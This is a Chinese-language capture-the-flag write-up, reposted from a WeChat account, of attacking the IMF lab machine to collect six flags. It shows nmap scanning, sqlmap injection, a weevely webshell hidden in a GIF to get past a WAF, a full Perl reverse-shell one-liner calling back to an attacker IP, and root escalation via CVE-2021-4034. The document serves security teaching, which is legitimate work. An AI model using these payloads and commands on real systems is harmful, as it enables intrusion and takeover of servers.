IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

admin 2025年3月17日09:55:34评论11 views字数 2748阅读9分9秒阅读模式

IMF爆肝7小时,绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

一、信息收集 2025.3.16 AM 13:28

1、主机发现

arp-scan -l nmap -sS 192.168.66.0/24IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

2、指纹扫描

nmap --script=vuln -p 21,22,80 192.168.66.181
扫描端口历史漏洞
nmap -sS -sV 192.168.66.181

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

这里只扫描出了80端口,端口越少我这心越慌啊,线索有点少 我们先扫描一下目录吧

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

3、目录扫描

dirsearch -u http://192.168.66.181/ -e * -i 200 dirb http://192.168.66.181 nikto -h 192.168.66.181 -p 80 gobuster dir -u http://192.168.66.181/backup_wordpress/-t30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -s 80

4、访问80端口

这里给了一点信息,但是有点模糊,像是用什么指令IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

这里给了几个邮箱,可能是某些账户IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵貌似是有些什么软件,可能会提权,也有一种可能就是我们上传某些命令打开靶机的端口IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

这里不知道是不是给了一个小彩蛋IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

allthefiles flag2{aW1mYWRtaW5pc3RyYXRvcg==} imfadministratorIMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里解码之后是这两个东西 http://192.168.66.181/imfadministrator/IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里是可以测试出来用户名称的,这下我们可以爆破了

访问了这个路径是一个登录页面,我们爆破一下 hydra -l rmichaels -P /usr/share/wordlists/rockyou.txt 192.168.66.181 http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:error" 这里无论是什么密码都失败了,看了wp,这里这能使用bp来抓包处理

5、寻找flag3,bp

第三个flag flag3{Y29udGludWVUT2Ntcw==} continueTOcms

使用sqlmap跑一下,正常来说oscp靶场不允许使用bp和sqlmap,但这个靶场有点特殊,我们尝试注入一下IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里发现了注入点,我们开始爆破

5、寻找flag4,sqlmap

不得不说,sqlmap确实香,一键爆破

sqlmap -u "http://192.168.66.181/imfadministrator/cms.php?pagename=home" --cookie "PHPSESSID=cvjavn85t6cm3pldfr1nbpp9s1" --dbs --batch
IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵
sqlmap -u "http://192.168.66.181/imfadministrator/cms.php?pagename=home" --cookie "PHPSESSID=cvjavn85t6cm3pldfr1nbpp9s1" --D admin --tables --batch
IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵
sqlmap -u "http://192.168.66.181/imfadministrator/cms.php?pagename=home" --cookie "PHPSESSID=cvjavn85t6cm3pldfr1nbpp9s1" -D admin --tables --batch 

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵ok,这里是爆了一张图片,我怀疑这台靶机可能是必须要用sqlmap和bo的

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵一张图片附带二维码 这里微信扫一下就拿到了flag flag4{dXBsb2Fkcjk0Mi5waHA=}

6、寻找flag5

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里还有一个php脚本

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵文件上传,这次离我们提权不远了 经过测试可以上传jpg、png、gif等文件,使用php一句话木马上传文件,靶机使用waf对eval()等函数进行了过滤,需要做一个绕过waf等检查机制,使用weevely生成一个PHP马 这里是我的一个盲区啊,但是我之前打过ctf,大概意思是我们可以修改文件16进制的开头,也就是文件类型

7、隧道建立nc

weevely generate hack test.phpIMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这次检测这个文件就是png文件了

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这种方式牛的,我之前只在windows系统上用这种方式复原,也算是一种容易被忽略的绕过吧

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里很奇怪,gif可以访问的到,但是png其他格式会报错

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里连接到了 GIF89a

然后我们创建一个gif图片就可以,是这种文件类型的,然后我们再把上面两段代码放到抓到的包里面就可以了IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里我们就可以访问到了 f0a5152d5b9b.gifIMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这个时候我们构建恶意脚本,上传执行命令。

GIF89a

访问这个url即可 URL:http://192.168.66.181/imfadministrator/uploads/822fb3998d69.gif?a=lsIMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里全是我们之前实验丢进去的文件

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵flag5{YWdlbnRzZXJ2aWNlcw==}

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里花了几个小时终于建立了shell,首先尝试python的pty模块IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

python -c 'import pty;pty.spawn("/bin/bash")'
这次不行,换种方式
perl -e 'use Socket;$i="192.168.66.129";$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
这里我们再弹一个shell

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这是也是建立了隧道

8、提权

终于终于最后一步了 lsb_release -a

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里上内核提权 这里用到一个提权漏洞:CVE-2021-4034:Linux提权漏洞,主要原因在于Polkit包下的Pkexec工具存在内存损害,允许非特权用户利用提升到ROOT。

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵这里拿到了root权限,我们找一找flag flag6{R2gwc3RQcm90MGMwbHM=}

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵2025.3.16 PM 20:42

原文始发于微信公众号(泷羽Sec-朝阳):IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月17日09:55:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   IMF爆肝7小时绿野仙踪寻找6大flag,层层递进、sqlmap、bp、weevely、nc、cve-2021-4034齐装上阵https://cn-sec.com/archives/3847398.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息